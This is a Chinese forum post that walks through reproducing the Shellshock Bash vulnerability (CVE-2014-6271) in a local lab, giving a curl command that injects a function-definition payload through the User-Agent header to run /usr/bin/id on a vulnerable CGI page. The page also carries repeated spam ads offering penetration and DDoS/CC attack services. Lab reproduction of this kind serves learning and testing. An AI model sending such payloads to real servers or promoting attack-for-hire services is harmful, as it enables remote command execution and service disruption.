登录
/
注册
首页
论坛
其它
首页
科技
业界
安全
程序
广播
Follow
关于
导读
排行榜
资讯
发帖说明
登录
/
注册
账号
自动登录
找回密码
密码
登录
立即注册
搜索
搜索
关闭
CSDN热搜
程序园
精品问答
技术交流
资源下载
本版
帖子
用户
软件
问答
教程
代码
写记录
写博客
小组
VIP申请
VIP网盘
网盘
联系我们
发帖说明
道具
勋章
任务
淘帖
动态
分享
留言板
导读
设置
我的收藏
退出
腾讯QQ
微信登录
返回列表
首页
›
业界区
›
安全
›
CVE-2014-6271 Bash破壳漏洞Shellshock (复现)
CVE-2014-6271 Bash破壳漏洞Shellshock (复现)
[ 复制链接 ]
呈步
2025-7-29 17:44:04
猛犸象科技工作室:
网站开发,备案域名,渗透,服务器出租,DDOS/CC攻击,TG加粉引流
服务启动后,通过浏览器或命令行访问以下两个页面,确认服务已正常运行:
存在漏洞的页面(基于 bash4.3):http://your-ip:8080/victim.cgi
修复后的页面(基于最新版 bash):http://your-ip:8080/safe.cgi
执行curl -H "User-Agent: () { foo; }; echo Content-Type: text/plain; echo; /usr/bin/id" http://192.168.75.132:8080/victim.cgi命令
发送 HTTP 请求,在User-Agent头中注入 Payload
Payload 说明:
() { foo; }; 是为了绕过 bash 的函数定义检查,后面的echo Content-Type: text/plain; echo; /usr/bin/id会被漏洞 bash 执行,其中:
echo Content-Type: text/plain; echo; 用于正确输出 HTTP 响应头
/usr/bin/id 是要执行的系统命令(可替换为其他命令,如/bin/ls等)
观察结果
访问victim.cgi时,命令会被成功执行,返回id命令的结果(如用户 UID、GID 等信息),说明漏洞存在。
访问safe.cgi时,相同的 Payload 不会被执行,只会返回正常页面内容,说明修复有效
这里返回id命令,漏洞利用成功!
来源:程序园用户自行投稿发布,如果侵权,请联系站长删除
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!
CVE
2014
6271
Bash
破壳
相关帖子
Vulnhub-Source-1(CVE-2019-15107)
CVE-2025-29927 Next.js 中间件权限绕过漏洞复现
AD 提权-CVE-2022-26923: CertiFried
Bash和Zsh中read命令的使用区别
Bash中; && ||命令连接符不是逻辑连接符、多个命令的执行顺序
CVE-2018-8715 AppWeb认证绕过漏洞 (复现)
漏洞通报 — CVE-2025-50817(Python-future:test.py 未预期导入导致任意代码执行)
Struts2 S2-066(CVE-2023-50164)漏洞复现
CVE-2025-50817(Python-future:test.py 未预期导入导致任意代码执行)
Bash 入门指南-简介和常见命令
回复
使用道具
举报
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
照妖镜
相关推荐
业界
Vulnhub-Source-1(CVE-2019-15107)
1
657
各卧唯
2025-06-04
科技
CVE-2025-29927 Next.js 中间件权限绕过漏洞复现
3
537
仲秀娟
2025-06-07
业界
AD 提权-CVE-2022-26923: CertiFried
4
835
卢莹洁
2025-06-07
安全
Bash和Zsh中read命令的使用区别
2
779
袂沐
2025-06-09
安全
Bash中; && ||命令连接符不是逻辑连接符、多个命令的执行顺序
5
610
啪炽
2025-06-11
安全
CVE-2018-8715 AppWeb认证绕过漏洞 (复现)
2
535
左优扬
2025-07-29
安全
漏洞通报 — CVE-2025-50817(Python-future:test.py 未预期导入导致任意代码执行)
3
173
咒卖箴
2025-09-12
安全
Struts2 S2-066(CVE-2023-50164)漏洞复现
1
206
蓝娅萍
2025-09-26
安全
CVE-2025-50817(Python-future:test.py 未预期导入导致任意代码执行)
2
276
陶田田
2025-11-01
业界
Bash 入门指南-简介和常见命令
0
948
挡缭
2025-11-08
回复
(4)
悯拄等
2025-10-15 17:31:36
回复
使用道具
举报
照妖镜
程序园永久vip申请,500美金$,无限下载程序园所有程序/软件/数据/等
热心回复!
喳谍
2025-11-8 17:14:02
回复
使用道具
举报
照妖镜
猛犸象科技工作室:
网站开发,备案域名,渗透,服务器出租,DDOS/CC攻击,TG加粉引流
感谢分享
圉棺
7 天前
回复
使用道具
举报
照妖镜
程序园永久vip申请,500美金$,无限下载程序园所有程序/软件/数据/等
懂技术并乐意极积无私分享的人越来越少。珍惜
县挫伪
5 天前
回复
使用道具
举报
照妖镜
程序园永久vip申请,500美金$,无限下载程序园所有程序/软件/数据/等
这个好,看起来很实用
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
回复
本版积分规则
回帖并转播
回帖后跳转到最后一页
签约作者
程序园优秀签约作者
发帖
呈步
5 天前
关注
0
粉丝关注
16
主题发布
板块介绍填写区域,请于后台编辑
财富榜{圆}
3934307807
991124
anyue1937
9994893
kk14977
6845358
4
xiangqian
638210
5
韶又彤
9997
6
宋子
9982
7
闰咄阅
9993
8
刎唇
9993
9
俞瑛瑶
9998
10
蓬森莉
9951
查看更多
今日好文热榜
390
Streamlit + LangChain 1.0 简单实现智能问
477
Oracle性能诊断与SQL优化:从9i到19c的技术
914
具身智能:零基础入门睿尔曼机械臂(五)—
220
NGD-SLAM(二)
397
[表单]HTML Learn Data Day 1
162
Oracle等待事件:性能诊断与优化的核心指南
590
“静态回调+上下文指针”模式实现回调机制
106
从 Tool Calling 到 A2A,再到 MCP. 大模型
379
BUUCTF 0ctf_2018_heapstorm2 PWN house of
294
仅通过一句提示词,就可以让大模型变得更有
984
生成式引擎优化(GEO优化)全维度技术指南
548
GEO优化实战指南2025:六大服务商核心能力
763
原始类型与泛型对比笔记
687
印度股票数据 API 对接实战指南(含实时行
661
Apipost分支功能:为API开发打造专属的成本
332
OpenCVSharp:学习人脸检测例子
553
JSAPIThree 加载单体三维模型学习笔记:Sim
127
读捍卫隐私09匿名指南
73
工作中常用函数详解与示例-PostgreSQL(其他
591
很顶!零成本克隆你的声音,这款B站开源神